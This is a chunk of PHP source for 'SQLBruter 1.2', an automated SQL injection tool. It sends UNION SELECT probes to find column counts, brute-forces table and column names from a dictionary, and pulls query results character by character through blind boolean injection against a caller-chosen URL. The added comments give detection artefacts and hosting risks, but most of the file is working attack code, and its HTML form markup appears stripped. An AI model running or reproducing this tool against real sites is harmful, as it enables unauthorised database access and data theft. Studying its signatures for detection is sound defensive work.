"; /** SQLBruter 1.2 - single-file PHP front end (the echo closed by the leading quote began before this chunk). Dispatch: neither submit nor ?encode -> print the form inside die(); ?encode -> the string-converter branch; otherwise the bruteforce parameters are read from $_POST below and the selected mode is run. All later functions share state through global. Reviewed from the hosting side: the script relays caller-built HTTP requests to caller-chosen hosts and writes a caller-named log file, so a copy left on a web server is itself an exposure. */ if ((!isset($_POST['submit'])) && (!isset($_GET['encode']))) { die ("

SQLBruter 1.2

URL
String
log file
proxy
mode Number of selected rows bruteforce 
Names of tables bruteforce 
Names of columns bruteforce
Character-oriented bruteforce
max number of rows to brute
get columns which can output information
number of the selected rows
path to the dictionary file
prefix
number of the selected rows
path to the dictionary file
name of the table to brute
DB query
use specific range of chars  

String converter



" ); } elseif (isset($_GET['encode'])) { /* String converter branch: $_POST['strconv_post'] is rendered as a comma-joined byte list wrapped in CHAR(...), as 0x-prefixed hex, and as base64/md5/sha1 (labels at the end of this branch). $res, $ascii and $hex stay empty when the input is empty; the base64/md5/sha1 values are set whenever submit_encode is present. */ $strconv = $_POST['strconv_post']; $len = strlen($strconv); echo "

SQLBruter 1.2



"; for ($i = 0; $i < $len; $i++) { $substring = substr($strconv,$i,1); $ascii_code = ord($substring); if ($i == ($len - 1)) $res .= $ascii_code; else $res .= $ascii_code.","; } if (($len > 0) && (isset($_POST['submit_encode']))) $ascii = "CHAR(".$res.")"; else $ascii = null; if (($len > 0) && (isset($_POST['submit_encode']))) $hex = "0x".bin2hex($strconv); else $hex = null; if(isset($_POST['submit_encode'])) $base64 = base64_encode($strconv); if(isset($_POST['submit_encode']))$md5= md5($strconv); if(isset($_POST['submit_encode']))$sha1 = sha1($strconv); echo "
ASCII (SQL syntax)
HEX
BASE64
MD5
SHA1
"; die; } /* Bruteforce entry point. url_post, string_post and mode_post are mandatory (die otherwise); log_post and proxy_post are optional, but the proxy regex check runs either way ($proxy_regex is not defined in this chunk - presumably earlier in the file, and it must accept an empty value for the no-proxy case to get past it). parse_url($url) supplies $host/$path/$param/$port (default 80), which every request builder below reads as globals. Review note: $log and $dic are raw POST paths handed to fopen() later (see savelogfile/checkdic), and $host/$proxy become outbound fsockopen() targets. */ if (!empty($_POST['url_post'])) $url = $_POST['url_post']; else die("NO URL"); if (!empty($_POST['string_post'])) $string = $_POST['string_post']; else die("NO STRING"); if (!empty($_POST['mode_post'])) $mode = $_POST['mode_post']; else die("NO MODE"); if (!empty($_POST['log_post'])) $log = $_POST['log_post']; if (!empty($_POST['proxy_post']))$proxy = $_POST['proxy_post']; $c = preg_match($proxy_regex,$proxy); if (!$c) die("NOT A VALID PROXY"); $conn = @parse_url($url); $host = $conn["host"]; $path = $conn["path"]; $param = $conn["query"]; if (isset($conn["port"])) $port = $conn["port"]; else $port=80; switch ($mode) { case 1: if (!empty($_POST['max_post'])) $max = $_POST['max_post']; else die("NO MAX NUMBER OF ROWS"); if (!empty($_POST['getcols_post'])) $getcols = $_POST['getcols_post']; if ($getcols == "on") $getcols = 1; else $getcols = 0; show_params(); mode1($url, $string, $max, $getcols); break; case 2: if (!empty($_POST['rows1_post'])) $rows = $_POST['rows1_post']; else die("NO ROWS"); if (!empty($_POST['dic1_post'])) $dic = $_POST['dic1_post']; else die("NO DICTIONARY"); if (!empty($_POST['pref_post'])) $pref = $_POST['pref_post']; show_params(); brute($url, $string, $rows, $dic, FALSE); break; case 3: if (!empty($_POST['rows2_post'])) $rows = $_POST['rows2_post']; else die("NO ROWS"); if (!empty($_POST['dic2_post'])) $dic = $_POST['dic2_post']; else die("NO DICTIONARY"); if (!empty($_POST['table_post'])) $table = $_POST['table_post']; else die("NO TABLE"); show_params(); brute($url, $string, $rows, $dic, $table); break; case 4: if (!empty($_POST['query_post'])) $query = $_POST['query_post']; else die("NO QUERY"); if (!empty($_POST['ot_post'])) $ot = $_POST['ot_post']; else $ot = 97; if (!empty($_POST['do_post'])) $do = $_POST['do_post']; else $do = 122; show_params(); mode4($url, $string, $query, $ot, $do); break; } /** Label for mode 1..4, used by show_params() and the log banner; the array is indexed by $mode-1. @param int|string $mode @return string */ function mode_name($mode) { $modes = array("Number of selected rows bruteforce", "Names of tables bruteforce", "Names of columns 
bruteforce", "Character-oriented bruteforce"); return $modes[$mode-1]; } /** Echoes the effective parameters back to the browser before the run (each value htmlspecialchars()-escaped). checkdic() is called here for the word count, so an unreadable dictionary dies at this point. Reads everything via global; returns nothing. */ function show_params() { global $url, $string, $mode, $log, $proxy, $max, $rows, $dic, $pref, $table, $query, $ot, $do; $mode_name = mode_name($mode); echo "

SQLBruter 1.2

URL ".htmlspecialchars($url)."
String ".htmlspecialchars($string)."
Mode".htmlspecialchars($mode_name)."
"; if (isset($log)) echo "
Log file ".htmlspecialchars($log)."
"; if (isset($proxy)) echo "
Proxy ".htmlspecialchars($proxy)."
"; switch ($mode) { case 1: echo "
Rows max number ".htmlspecialchars($max)."
"; break; case 2: echo "
Number of the selected rows ".htmlspecialchars($rows)."
"; echo "
Dictionary ".htmlspecialchars($dic)." (".checkdic($dic)." words)
"; if (isset($pref)) echo "
Prefix ".htmlspecialchars($pref)."
"; break; case 3: echo "
Number of the selected rows ".htmlspecialchars($rows)."
"; echo "
Dictionary ".htmlspecialchars($dic)." (".checkdic($dic)." words)
"; echo "
Table ".htmlspecialchars($table)."
"; break; case 4: echo "
Query ".htmlspecialchars($query)."
"; echo "
From ".htmlspecialchars($ot)."
"; echo "
To ".htmlspecialchars($do)."
"; break; } echo "

"; flush(); } /** Writes one pre-built raw HTTP request and returns the raw response text. No proxy: fsockopen(gethostbyname($host), $port), then fgets() until EOF (the blocking/timeout calls run before the handle is checked). Proxy "host:port": connect to the proxy, then fread() one byte at a time until EOF has been reached and a CRLFCRLF sequence has been seen (eregi(), removed in PHP 7). If the connect fails only a message is echoed and $html is returned unset; the proxy message interpolates $proxy unescaped. Detection note: each request carries an explicit Host header and Connection: Close, so the full injected query string lands in the target's access log. @param string $packet @return string */ function sendpacket($packet) { global $host, $port, $proxy; if (empty($proxy)) { $ock = @fsockopen(@gethostbyname($host),$port); stream_set_blocking($ock, 0); stream_set_timeout($ock,600); if (!$ock) { echo "No response from ".$host.":80
"; } else { fputs($ock, $packet); $html=""; while (!feof($ock)) { $html.=fgets($ock); } } } else { $parts=explode(":",$proxy); $ock2=@fsockopen($parts[0],$parts[1]); if (!$ock2) { echo "No response from proxy ($proxy)"; } else { fputs($ock2,$packet); $html=""; while ((!feof($ock2)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock2,1); } } } return $html; } /** Appends a report block to $logfile, creating it world-writable (chmod 0777) when absent. $logfile is the unvalidated POST value. Forensic signature of such logs: a line starting "*** SQLBruter's report [" followed by "[~] <mode label>", the result text and an underscore rule. @param string $logfile @param int $mode @param string $text @return void */ function savelogfile($logfile, $mode, $text) { if (!is_file($logfile)) { $s = @fopen($logfile,"w"); fclose($s); chmod($logfile,0777); } $fp = @fopen($logfile,"a"); fputs($fp, "*** SQLBruter's report [".date(" l dS 0f F Y h:i:s A ")."] ***\r\n"); fputs($fp, "[~] ".mode_name($mode)."\r\n".$text."\r\n"); fputs($fp, "____________________________________________________________________\r\n"); fclose($fp); } /** Counts dictionary lines with fgets() until EOF; dies with "INVALID DICTIONARY" if the path cannot be opened. $x is never initialised, so it starts from null and counts up. @param string $dic path @return int|null */ function checkdic($dic) { $handle = @fopen($dic, "r"); if ($handle) { while (!feof($handle)) { $buffer = fgets($handle, 4096); $x++; } fclose($handle); } else die("INVALID DICTIONARY"); return $x; } /** Mode 1: finds the column count by sending "<param>%20UNION%20SELECT%200[,0...]/*" for 1..$max columns and stopping at the first body containing $string. With $getcols it re-sends with each column replaced by 0x72617a3072 (hex of "raz0r") followed by hex(column index), after forcing the last "=" value of $param to -1, and records every "raz0r<n>" marker echoed back in $visiblecols. Prints the resulting URL, logs it with mode 1 when $log is set, then die()s. $null and $razor accumulate across iterations. Detection note: the marker string "raz0r" in requests or responses and the repeated "%20UNION%20SELECT%20" request line are the artefacts. @param string $url @param string $string @param int $max @param int $getcols */ function mode1($url, $string, $max, $getcols) { global $log, $proxy, $host, $path, $param; echo ""; flush(); for ($i = 0; $i < $max; $i++) { if ($i > 0) $null .=",0"; else $null = "0"; $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null."/* HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $content = sendpacket($packet); if (strpos($content, $string)>0) { if ($getcols == 1) { for ($z = 1; $z <= ($i+1); $z++) { if ($z > 1) $razor .=",0x72617a3072".bin2hex($z); else $razor = "0x72617a3072".bin2hex($z); } $temp = explode("=", $param); $temp[(sizeof($temp)-1)] = "-1"; $param = implode("=", $temp); $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$razor."/* HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $content = sendpacket($packet); for ($y = 1; $y <= ($i+1); $y++) { if (strpos($content, ("raz0r".$y)) > 0) $visiblecols[] .= $y; } if (!is_array($visiblecols)) {$nocols = 1;} } echo ""; echo "
Number of rows is ".($i+1)."
"; if (($getcols == 1) && ($nocols != 1)) {$result = $url." UNION SELECT ".$null."/*
Columns ".@implode(",", $visiblecols)." can output information";} elseif ($nocols == 1) $result = $url." UNION SELECT ".$null."/*
No columns which can output information"; else $result = $url." UNION SELECT ".$null."/*"; echo $result; echo "
"; flush(); if (isset($log)) {$result = str_replace("
", "\r\n", $result); savelogfile($log, 1, $result);} die; } } echo ""; flush(); } /** Modes 2 (tables, $table === FALSE) and 3 (columns). Reads the dictionary line by line, trims each word, prefixes it with $pref . "_" when $pref is set (only mode 2 sets it), skips words that are empty, numeric or contain "-" or a space, and sends one request per word: "... UNION SELECT 0,... FROM <word>/*" or "... UNION SELECT 0,...,<word> FROM <table>/*" (the word is url-encoded, $table is not). A hit is a body containing $string; it is echoed and, if $log is set, written with mode 2 or 3. $z/$r/$percent/$words_per_second feed a once-per-second progress echo whose markup is empty in this copy. Detection note: one request per dictionary word from one client, i.e. a burst of UNION SELECT ... FROM queries against a single path. @param string $url @param string $string @param int $rows @param string $dic @param string|false $table */ function brute($url, $string, $rows, $dic, $table) { global $log, $proxy, $pref, $host, $path, $param; $x = checkdic($dic); echo "
"; flush(); $handle = @fopen($dic, "r"); if ($handle) { $begin_time = time(); if ($table === FALSE) { for ($i = 0; $i < $rows; $i++) { if ($i > 0) $null .=",0"; else $null = "0"; } } else { for ($i = 0; $i < ($rows-1); $i++) { if ($i > 0) $null .=",0"; else $null = "0"; } } for ($i = 0; $i < $x; $i++) { $word = fgets($handle, 4096); $word = ereg_replace("\n", "", $word); $word = ereg_replace("\r", "", $word); $word = trim($word); if (isset($pref)) $word = $pref."_".$word; if (($word !== "") & (!is_numeric($word)) & (!strpos($word,"-")) & (!strpos($word, " "))) { if ($table === FALSE) $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null."%20FROM%20".urlencode($word)."/* HTTP/1.1\r\n"; else $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null.",".urlencode($word)."%20FROM%20".$table."/* HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $content = sendpacket($packet); $z++; $r++; if ($begin_time + 1 == time()) { $begin_time += 1; $percent = round($z/$x * 100); $words_per_second = $r; $r = 0; echo ""; flush(); } elseif ($begin_time + 1 < time()) { $begin_time = time() + 1; $percent = round($z/$x * 100); $words_per_second = $r; $r = 0; echo ""; flush(); } if (strpos($content, $string)>0) { if ($table === FALSE) { $result = $url." UNION SELECT ".$null." FROM ".$word."/*"; echo "
Table was found - $word
$result

"; } else { $result = $url." UNION SELECT ".$null.",".$word." FROM ".$table."/*"; echo "
Column was found - $word
$result

"; } flush(); if (isset($log)) { if ($table === FALSE) savelogfile($log, 2, $result); else savelogfile($log, 3, $result); } } } } } } /** Mode 4 helper: binary search over character codes [$min, $max] for position $sp of the query result. Asks check() whether the code is greater than the midpoint and recurses into the upper or lower half; once the span is below 5 it calls crack(), and every path in crack() ends in die(), so found() never returns normally. $status is computed but the print is empty in this copy. @param int $min @param int $max @param int $sp @param string $result characters found so far */ function found($min, $max, $sp, $result) { if (($max-$min)<5) crack($min,$max, $sp, $result); $r = round($max - ($max-$min)/2); $check = ">$r"; if ( check($check, $sp, $result)) { if (!empty($result)) $status = "(".$result.")"; print ""; flush(); found($r,$max, $sp, $result); } else { if (!empty($result)) $status = "(".$result.")"; print ""; flush(); found($min,$r+1, $sp, $result); } } /** Mode 4 helper: tests codes $cmin..$cmax one by one for position $sp after confirming via ">0" that a character exists there. On a match the character is appended to $result and found() is started for the next position over $ot..$do (97..122, i.e. a-z, when unset). Every exit is a die(): the query and result are printed and, when $output is set, passed to save_result() - neither $output nor save_result() is defined in this chunk. @param int $cmin @param int $cmax @param int $sp @param string $result */ function crack($cmin, $cmax, $sp, $result) { global $ot, $do, $output, $query; $i = $cmin; $check1 = ">0"; if (check($check1, $sp, $result)) { while ($i<=$cmax) { $check = "=$i"; if (!empty($result)) $status = "(".$result.")"; echo ""; flush(); if (check($check, $sp, $result)) { $result .= chr($i); $sp++; if (!isset($ot) || !isset($do)) { $ot = 97; $do = 122; } found($ot, $do, $sp, $result); } $i++; } if (((empty($result)) && ($sp == 2)) or (empty($result))) { echo ""; flush(); die; } else { if (isset($output)) save_result("\n Query ".$query." - ".$result."\n"); echo ""; flush(); die(""); } } if (((empty($result)) && ($sp == 2)) or (empty($result))) { echo ""; flush(); die; } else die("
$query - $result
"); } /** Single boolean-injection probe for mode 4: appends "%20AND%20ascii(lower(substring(<query>,<sp>,1)))<check>" to the query string and returns 1 when the response body contains $string, else 0 (a match at offset 0 counts as no match because of the > 0 test). Detection note: a mode-4 run is a tight sequence of requests that differ only in the position and comparison value, all containing "ascii(lower(substring(". @param string $check comparison such as ">97" or "=97" @param int $sp @param string $result unused here @return int */ function check($check, $sp, $result) { global $path, $host, $param, $query, $string; $packet = "GET ".$path."?".$param."%20AND%20ascii(lower(substring(".urlencode($query).",".$sp.",1)))".$check." HTTP/1.1\r\n"; $packet .= "Host: ".$host."\r\n"; $packet .= "Connection: Close\r\n\r\n"; $html = sendpacket($packet); if (strpos($html,$string) > 0) return 1; return 0; } /** Mode 4 entry: character-by-character extraction of $query via found()/crack(), starting at position 1 with an empty result. $url and $string are unused in this body because the request builders read the parsed globals. @param string $url @param string $string @param string $query @param int $ot @param int $do */ function mode4($url, $string, $query, $ot, $do) { global $log, $proxy, $host, $path, $param; echo "
"; flush(); found($ot, $do, 1, ""); } /* Trailing output. $mode_post is never assigned in this chunk (the posted mode lives in $mode), so this condition cannot be true as written; the echoes are empty in this copy. */ if (($mode_post == 2) || ($mode_post == 3) ) echo ""; echo ""; flush(); ?>